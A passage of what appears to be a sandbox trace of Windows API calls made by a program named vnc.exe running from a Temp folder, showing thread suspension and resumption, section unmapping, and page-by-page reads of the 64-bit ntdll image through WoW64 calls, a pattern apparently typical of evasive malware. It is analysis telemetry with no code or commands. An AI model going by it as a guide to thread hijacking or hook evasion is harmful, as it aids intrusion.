[5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x47, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x2, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0xe0, [74]=0x25, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x400004, SegGs=0x10000, SegFs=0xbac63980, SegEs=0x7ff6, SegDs=0xcff58, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x25e000, Ecx=0x0, Eax=0x25e000, Ebp=0x0, Eip=0x25e000, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x18, [45]=0x2, [46]=0x2, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0141.868] ResumeThread (hThread=0x16c) returned 0x1 [0143.887] Sleep (dwMilliseconds=0x1f4) [0144.555] SuspendThread (hThread=0x16c) returned 0x0 [0144.555] LocalFree (hMem=0x629120) returned 0x0 [0144.555] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0xa90000) returned 0x0 [0144.577] RtlNtStatusToDosError (Status=0x0) returned 0x0 [0144.577] CloseHandle (hObject=0x17c) returned 1 [0144.577] GetCurrentProcessId () returned 0xaf4 [0144.577] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaf4) returned 0x17c [0144.578] GetModuleHandleW (lpModuleName="NTDLL.DLL") returned 0x778f0000 [0144.578] GetProcAddress (hModule=0x778f0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77968930 [0144.578] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x17c, ProcessInformationClass=0x0, ProcessInformation64=0x19ef60, ProcessInformationLength=0x30, ReturnLength=0x19efb8 | out: ProcessInformation64=0x19ef60, ReturnLength=0x19efb8) returned 0x0 [0144.578] LocalAlloc (uFlags=0x0, uBytes=0x200) returned 0x629120 [0144.579] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x61df68 [0144.579] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x380000, Buffer=0x0, BufferSize=0x61df68, NumberOfBytesRead=0x28 | out: Buffer=0x0, NumberOfBytesRead=0x28) returned 0x0 [0144.579] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28c45200, Buffer=0x7ffb, BufferSize=0x61df90, NumberOfBytesRead=0x40 | out: Buffer=0x7ffb, NumberOfBytesRead=0x40) returned 0x0 [0144.579] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e1c70, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0144.579] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e1af0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0144.579] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2110, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0144.579] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e23f0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0144.579] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e25c0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0144.579] LocalFree (hMem=0x629120) returned 0x0 [0144.579] LocalFree (hMem=0x61df68) returned 0x0 [0144.579] VirtualAlloc (lpAddress=0x0, dwSize=0x5a4, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000 [0144.580] GetModuleHandleW (lpModuleName="NTDLL.DLL") returned 0x778f0000 [0144.580] GetProcAddress (hModule=0x778f0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77968930 [0144.580] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x17c, ProcessInformationClass=0x0, ProcessInformation64=0x19ef60, ProcessInformationLength=0x30, ReturnLength=0x19efb8 | out: ProcessInformation64=0x19ef60, ReturnLength=0x19efb8) returned 0x0 [0144.580] LocalAlloc (uFlags=0x0, uBytes=0x200) returned 0x629120 [0144.580] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x61df68 [0144.581] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x380000, Buffer=0x0, BufferSize=0x61df68, NumberOfBytesRead=0x28 | out: Buffer=0x0, NumberOfBytesRead=0x28) returned 0x0 [0144.581] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28c45200, Buffer=0x7ffb, BufferSize=0x61df90, NumberOfBytesRead=0x40 | out: Buffer=0x7ffb, NumberOfBytesRead=0x40) returned 0x0 [0144.581] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e1c70, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0144.581] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e18a8, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x58 | out: Buffer=0x0, NumberOfBytesRead=0x58) returned 0x0 [0144.581] StrRChrA (lpStart="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\vnc.exe", lpEnd=0x0, wMatch=0x5c) returned="\\vnc.exe" [0144.581] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e1af0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0144.581] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e19f0, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3a | out: Buffer=0x0, NumberOfBytesRead=0x3a) returned 0x0 [0144.581] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ntdll.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ntdll.dll" [0144.581] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2110, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0144.581] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2290, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3a | out: Buffer=0x0, NumberOfBytesRead=0x3a) returned 0x0 [0144.581] StrRChrA (lpStart="C:\\Windows\\system32\\wow64.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64.dll" [0144.581] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e23f0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0144.582] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2570, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x40 | out: Buffer=0x0, NumberOfBytesRead=0x40) returned 0x0 [0144.582] StrRChrA (lpStart="C:\\Windows\\system32\\wow64win.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64win.dll" [0144.582] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e25c0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0144.582] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2090, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x40 | out: Buffer=0x0, NumberOfBytesRead=0x40) returned 0x0 [0144.582] StrRChrA (lpStart="C:\\Windows\\system32\\wow64cpu.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64cpu.dll" [0144.582] LocalFree (hMem=0x629120) returned 0x0 [0144.582] LocalFree (hMem=0x61df68) returned 0x0 [0144.582] lstrcmpiA (lpString1="vnc.exe", lpString2="NTDLL.DLL") returned 1 [0144.582] StrChrA (lpStart="vnc.exe", wMatch=0x2e) returned=".exe" [0144.582] lstrcmpiA (lpString1="vnc", lpString2="NTDLL.DLL") returned 1 [0144.582] lstrcmpiA (lpString1="ntdll.dll", lpString2="NTDLL.DLL") returned 0 [0144.583] VirtualFree (lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.583] VirtualAlloc (lpAddress=0x0, dwSize=0x1c1000, flAllocationType=0x3000, flProtect=0x4) returned 0xa90000 [0144.583] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b00000, Buffer=0x7ffb, BufferSize=0xa90000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.583] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b01000, Buffer=0x7ffb, BufferSize=0xa91000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.584] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b02000, Buffer=0x7ffb, BufferSize=0xa92000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.584] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b03000, Buffer=0x7ffb, BufferSize=0xa93000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.584] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b04000, Buffer=0x7ffb, BufferSize=0xa94000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.584] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b05000, Buffer=0x7ffb, BufferSize=0xa95000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.584] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b06000, Buffer=0x7ffb, BufferSize=0xa96000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.585] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b07000, Buffer=0x7ffb, BufferSize=0xa97000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.585] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b08000, Buffer=0x7ffb, BufferSize=0xa98000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.585] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b09000, Buffer=0x7ffb, BufferSize=0xa99000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.585] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0a000, Buffer=0x7ffb, BufferSize=0xa9a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.585] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0b000, Buffer=0x7ffb, BufferSize=0xa9b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.586] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0c000, Buffer=0x7ffb, BufferSize=0xa9c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.586] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0d000, Buffer=0x7ffb, BufferSize=0xa9d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.586] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0e000, Buffer=0x7ffb, BufferSize=0xa9e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.586] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0f000, Buffer=0x7ffb, BufferSize=0xa9f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.587] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b10000, Buffer=0x7ffb, BufferSize=0xaa0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.587] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b11000, Buffer=0x7ffb, BufferSize=0xaa1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.587] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b12000, Buffer=0x7ffb, BufferSize=0xaa2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.587] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b13000, Buffer=0x7ffb, BufferSize=0xaa3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.587] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b14000, Buffer=0x7ffb, BufferSize=0xaa4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.588] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b15000, Buffer=0x7ffb, BufferSize=0xaa5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.588] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b16000, Buffer=0x7ffb, BufferSize=0xaa6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.588] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b17000, Buffer=0x7ffb, BufferSize=0xaa7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.588] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b18000, Buffer=0x7ffb, BufferSize=0xaa8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.588] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b19000, Buffer=0x7ffb, BufferSize=0xaa9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.589] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1a000, Buffer=0x7ffb, BufferSize=0xaaa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.589] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1b000, Buffer=0x7ffb, BufferSize=0xaab000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.589] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1c000, Buffer=0x7ffb, BufferSize=0xaac000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.589] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1d000, Buffer=0x7ffb, BufferSize=0xaad000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.590] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1e000, Buffer=0x7ffb, BufferSize=0xaae000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.590] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b1f000, Buffer=0x7ffb, BufferSize=0xaaf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.613] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b20000, Buffer=0x7ffb, BufferSize=0xab0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.639] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b21000, Buffer=0x7ffb, BufferSize=0xab1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.639] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b22000, Buffer=0x7ffb, BufferSize=0xab2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.639] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b23000, Buffer=0x7ffb, BufferSize=0xab3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.639] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b24000, Buffer=0x7ffb, BufferSize=0xab4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.640] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b25000, Buffer=0x7ffb, BufferSize=0xab5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.640] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b26000, Buffer=0x7ffb, BufferSize=0xab6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.640] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b27000, Buffer=0x7ffb, BufferSize=0xab7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.640] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b28000, Buffer=0x7ffb, BufferSize=0xab8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.641] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b29000, Buffer=0x7ffb, BufferSize=0xab9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.641] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2a000, Buffer=0x7ffb, BufferSize=0xaba000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.641] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2b000, Buffer=0x7ffb, BufferSize=0xabb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0144.641] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b2c000, Buffer=0x7ffb, BufferSize=0xabc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 